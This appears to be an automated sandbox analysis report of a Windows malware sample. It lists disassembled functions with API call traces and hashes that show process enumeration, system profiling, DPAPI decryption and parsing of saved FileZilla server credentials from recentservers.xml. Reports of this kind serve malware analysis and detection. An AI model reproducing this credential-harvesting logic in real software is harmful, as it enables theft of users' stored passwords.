Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
String ID: /
API String ID: 3090951853-4001269591
Opcode ID: e9b07a4b66169ae561c5be69a29ee4cdecbb651501a5d43b8c82435d6b75c7dc
Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
Opcode Fuzzy Hash: e9b07a4b66169ae561c5be69a29ee4cdecbb651501a5d43b8c82435d6b75c7dc
Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9

Function 00419790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
CloseHandle.KERNEL32(00420ACE), ref: 0041980A

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61

Function 00418810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
Process32First.KERNEL32(?,00000128), ref: 0041886E
Process32Next.KERNEL32(?,00000128), ref: 00418883

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

CloseHandle.KERNEL32(?), ref: 004188F1

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 9f9f6b1d8d5ad8f464c2b4a7046ebd9e7976c632ccd6c28ec0e3fd7f43b1058e
Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
Opcode Fuzzy Hash: 9f9f6b1d8d5ad8f464c2b4a7046ebd9e7976c632ccd6c28ec0e3fd7f43b1058e
Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5

Function 0040A2B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
memcpy.MSVCRT(?,?,?), ref: 0040A316
LocalFree.KERNEL32(?), ref: 0040A323

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotectmemcpy
String ID:
API String ID: 3243516280-0
Opcode ID: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction ID: b2ce5641e7fa807fe786f78e48a01c4c7ef199da86c861ee62a52048bf8154be
Opcode Fuzzy Hash: 7a2dd4eca20753c076bf09b0c62142b9a669e1cd6be9ab3d7b47191422cd3cdd
Instruction Fuzzy Hash: 3611ACB4900209DFCB04DF94D988AAE77B5FF88300F104559ED15A7350D734AE50CF61

Function 00417BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000), ref: 00417BF3
HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417BFA
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,02D456C8,00000000,?,00420DF8,00000000,?,00000000,00000000,?), ref: 00417C0D
wsprintfA.USER32 ref: 00417C47

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocInformationProcessTimeZonewsprintf
String ID:
API String ID: 362916592-0
Opcode ID: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction ID: b2a27aae97358dcb217157a2278e60ef806da717b76b9d8dbc6f71207b10123d
Opcode Fuzzy Hash: ef2e8192f2772f232fc7e7fcc2eea8e627b037badb6437208f4d82c9303bd787
Instruction Fuzzy Hash: C011A1B1E0A228EBEB208B54DC45FA9BB79FB45711F1003D6F619932D0E7785A808B95

Function 004179E0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: Heap$AllocNameProcessUser
String ID:
API String ID: 1206570057-0
Opcode ID: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction ID: 9b82aaaa51ecd1631f431d3f1c3dae0ecd6dc6cababe86b84151973db8bb3773
Opcode Fuzzy Hash: 7e9e81e1a1689cb1da455be5f83933a8c8cca94e355bd3ccc2ffb479564026f7
Instruction Fuzzy Hash: 80F04FB1D49249EBC700DF98DD45BAEBBB8EB45711F10021BF615A2680D7755640CBA1

Function 00418060 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00420E14), ref: 00418090
wsprintfA.USER32 ref: 004180A6

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction ID: 08512fc152d1616d0ad9ea22e4a9698bc695f8d0908738fe214e90ce4e812d63
Opcode Fuzzy Hash: 49ec3605ab8d8b87b8f4a2bcd41593a6bcb02f439a1b20a0ae29a7c341f305be
Instruction Fuzzy Hash: 67F06DB1E04218ABCB10CB84EC45FEAFBBDFB48B14F50066AF51592280E7796904CAE5

Function 00407770 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F,?,00416414,?), ref: 00407784
RtlAllocateHeap.NTDLL(00000000,?,00416414,?), ref: 0040778B
lstrcatA.KERNEL32(?,02D460A8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8,?,000003E8), ref: 0040793B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 0040794F
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407963
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407977
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 0040798B
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 0040799F
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 004079B2
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 004079C6
lstrcatA.KERNEL32(?,02D46130,?,00416414,?), ref: 004079DA
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 004079EE
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A02
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A16
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 00407A29
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 00407A3D
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 00407A51
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 00407A64
lstrcatA.KERNEL32(?,02D46198,?,00416414,?), ref: 00407A78
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407A8C
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AA0
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407AB4
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 00407AC8
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 00407ADB
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 00407AEF
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 00407B03
lstrcatA.KERNEL32(?,02D46200,?,00416414,?), ref: 00407B16
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B2A
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B3E
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407B52
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 00407B66
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 00407B7A
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 00407B8D
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 00407BA1
lstrcatA.KERNEL32(?,02D46268,?,00416414,?), ref: 00407BB5
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BC9
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BDD
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407BF1
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 00407C04
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 00407C18
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 00407C2C
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 00407C3F
lstrcatA.KERNEL32(?,02D462D0,?,00416414,?), ref: 00407C53
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C67
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C7B
lstrcatA.KERNEL32(?,?,?,00416414,?), ref: 00407C8F
lstrcatA.KERNEL32(?,02D452C0,?,00416414,?), ref: 00407CA3
lstrcatA.KERNEL32(?,02D45290,?,00416414,?), ref: 00407CB6
lstrcatA.KERNEL32(?,02D452A8,?,00416414,?), ref: 00407CCA
lstrcatA.KERNEL32(?,02D452D8,?,00416414,?), ref: 00407CDE

Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,00000000,00000000), ref: 004076A8
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020, : ), ref: 004076BA
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,00000000,00000000,00000000), ref: 004076EF
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,00421934), ref: 00407700
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,00000000,00000000,00000000), ref: 00407733
Part of subcall function 00407630: lstrcatA.KERNEL32(29637020,00421938), ref: 0040774D
Part of subcall function 00407630: task.LIBCPMTD ref: 0040775B

lstrcatA.KERNEL32(?,02D471A0,?,00000104), ref: 00407E6B
lstrcatA.KERNEL32(?,02D45EB0), ref: 00407E7E
lstrlenA.KERNEL32(29637020), ref: 00407E8B
lstrlenA.KERNEL32(29637020), ref: 00407E9B

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 83851e46e3bf4d705dc2f2e94c6bbcd0cbcc87bac3d7e7e98dab2cc42286d0f7
Instruction ID: 0e0c3d68e69f6296a9396c1eab42491480c8bc0a3d7b858fcfddc2671413b035
Opcode Fuzzy Hash: 83851e46e3bf4d705dc2f2e94c6bbcd0cbcc87bac3d7e7e98dab2cc42286d0f7
Instruction Fuzzy Hash: E83264B6D04254ABCB14EB60DC95DDE733EAB48315F004A9EF209A2090EE79F789CF55

Function 004103B0 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 363
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

strtok_s.MSVCRT ref: 0041047B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
lstrlenA.KERNEL32(00000000), ref: 004104F3

Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
lstrlenA.KERNEL32(00000000), ref: 0041053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
lstrlenA.KERNEL32(00000000), ref: 00410587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
lstrlenA.KERNEL32(00000000), ref: 004105D5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
strtok_s.MSVCRT ref: 004107D9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
memset.MSVCRT ref: 0041083D

Strings

<User>, xrefs: 00410570
url: , xrefs: 004106D7
browser: FileZilla, xrefs: 004106B9
login: , xrefs: 0041072A
password: , xrefs: 0041075B
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00410404
<Port>, xrefs: 00410526
profile: null, xrefs: 004106C8
<Host>, xrefs: 004104DC
<Pass encoding="base64">, xrefs: 004105BA

Memory Dump Source

Source File: 00000000.00000002.1773060008.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1773060008.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1773060008.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HrxOpVxK5d.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: eef6dc271c99be91049fa09db95f5eb5d11b7647e75994769f64c49614bb4fd0
Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
